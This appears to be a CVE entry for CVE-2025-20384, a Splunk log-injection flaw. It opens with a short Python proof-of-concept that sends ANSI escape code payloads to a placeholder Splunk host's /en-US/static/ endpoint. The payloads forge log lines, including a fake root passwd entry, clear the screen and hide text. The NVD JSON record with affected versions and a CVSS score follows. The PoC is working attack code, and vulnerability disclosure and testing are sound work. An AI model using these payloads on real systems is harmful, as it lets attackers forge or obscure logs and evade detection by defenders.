CVE-2025-20384

import requests # CVE-2025-20384 ANSI Escape Code Injection PoC # Target: Splunk Enterprise < 10.0.1, < 9.4.6, < 9.3.8, < 9.2.10 # Target: Splunk Cloud Platform < 10.1.2507.4, < 10.0.2503.6, < 9.3.2411.117.125 target_url = "http://target-splunk.com/en-US/static/" # ANSI Escape Code payloads payloads = [ # Clear screen and inject fake log entry "\x1b[2J\x1b[H=== SYSTEM ALERT: ATTACK DETECTED ===", # Move cursor and overwrite log line "\x1b[10;10HINJECTED LOG ENTRY", # Clear line and insert fake authentication success "\x1b[2Kadmin:x:0:0:root:/root:/bin/bash", # Hide subsequent content "\x1b[?25lMalicious Activity Hidden Here", # Change text color to hide content "\x1b[30mHidden Malicious Command\x1b[0m" ] for payload in payloads: try: response = requests.get( target_url, params={"file": payload}, timeout=10, verify=False ) print(f"Payload sent: {repr(payload)}") print(f"Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"Request failed: {e}")

{"cve": {"id": "CVE-2025-20384", "sourceIdentifier": "[email protected]", "published": "2025-12-03T17:15:50.740", "lastModified": "2025-12-05T18:14:07.767", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Splunk Enterprise versions below 10.0.1, 9.4.6, 9.3.8, and 9.2.10, and Splunk Cloud Platform versions below 10.1.2507.4, 10.0.2503.6, and 9.3.2411.117.125, an unauthenticated attacker can inject American National Standards Institute (ANSI) escape codes into Splunk log files due to improper validation at the /en-US/static/ web endpoint. This may allow them to poison, forge, or obfuscate sensitive log data through specially crafted HTTP requests, potentially impacting log integrity and detection capabilities."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-117"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.2.0", "versionEndExcluding": "9.2.10", "matchCriteriaId": "AE8BF109-2B9C-4C50-AC9F-10A45456FD75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.3.0", "versionEndExcluding": "9.3.8", "matchCriteriaId": "05D6973D-D965-42D3-8320-AF4A4B424E6C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.4.0", "versionEndExcluding": "9.4.6", "matchCriteriaId": "8571F470-6AE1-4737-B1FA-49121E426AF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:10.0.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "259A3F4B-E4D2-48BC-9AE9-C37DE94987D5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.3.2411", "versionEndExcluding": "9.3.2411.117", "matchCriteriaId": "055D722F-3C2C-45FF-B44F-FD73820F2A78"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.2503", "versionEndExcluding": "10.0.2503.6", "matchCriteriaId": "7BB42067-4A68-44D8-856A-2CC247C440E8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.1.2507", "versionEndExcluding": "10.1.2507.4", "matchCriteriaId": "93DAD528-22AD-49F4-93AB-5E1AB5D7002B"}]}]}], "references": [{"url": "https://advisory.splunk.com/advisories/SVD-2025-1203", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}